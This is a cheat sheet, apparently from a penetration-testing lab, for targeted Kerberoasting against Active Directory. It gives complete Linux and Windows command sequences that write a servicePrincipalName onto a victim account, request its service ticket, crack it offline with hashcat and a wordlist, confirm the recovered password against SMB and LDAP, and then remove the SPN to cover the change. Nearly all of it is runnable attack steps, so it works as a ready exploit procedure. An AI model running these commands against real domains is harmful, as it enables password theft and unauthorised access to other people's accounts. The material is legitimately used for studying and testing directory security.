Targeted Kerberoasting is used when we can write to a user object's servicePrincipalName attribute. We temporarily add an SPN to the target user, request a TGS for that new SPN, crack the ticket offline, and remove the SPN.
Confirm write access
bloodyAD --host 10.10.10.200 -d ootw.local -u student -p 'student' get object target.user --attr nTSecurityDescriptor
Linux automated targeted roast
python3 targetedKerberoast.py -vv -d ootw.local -u student -p 'student' --request-user target.user --dc-ip 10.10.10.200
Linux manual add SPN
bloodyAD --host 10.10.10.200 -d ootw.local -u student -p 'student' set object target.user servicePrincipalName -v nonexistent/target
GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request-user target.user -outputfile target.hash
bloodyAD --host 10.10.10.200 -d ootw.local -u student -p 'student' remove object target.user servicePrincipalName -v nonexistent/target
Windows manual add SPN
Set-DomainObject -Identity target.user -Set @{serviceprincipalname='nonexistent/target'} -Verbose
Get-DomainSPNTicket -SPN 'nonexistent/target' -OutputFormat Hashcat
Set-DomainObject -Identity target.user -Clear serviceprincipalname -Verbose
Windows with credentials
$SecPassword = ConvertTo-SecureString 'student' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('ootw.local\student', $SecPassword)
Set-DomainObject -Credential $Cred -Identity target.user -Set @{serviceprincipalname='nonexistent/target'} -Verbose
Get-DomainSPNTicket -Credential $Cred -SPN 'nonexistent/target' -OutputFormat Hashcat
Set-DomainObject -Credential $Cred -Identity target.user -Clear serviceprincipalname -Verbose
Crack
hashcat -m 13100 target.hash /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 13100 target.hash /usr/share/wordlists/rockyou.txt --show
Validate
nxc smb 10.10.10.200 -u target.user -p '<CRACKED_PASSWORD>' -d ootw.local
nxc ldap 10.10.10.200 -u target.user -p '<CRACKED_PASSWORD>' -d ootw.local
Cleanup verification
Get-DomainUser target.user -Properties serviceprincipalname
Notes
This attack depends on object write rights, not on the target already being a service account. The common paths are GenericAll, GenericWrite, WriteProperty, WriteSPN, or delegated write access over servicePrincipalName.
Always remove the SPN after the request. The valuable artifact is the offline hash, not the modified directory object.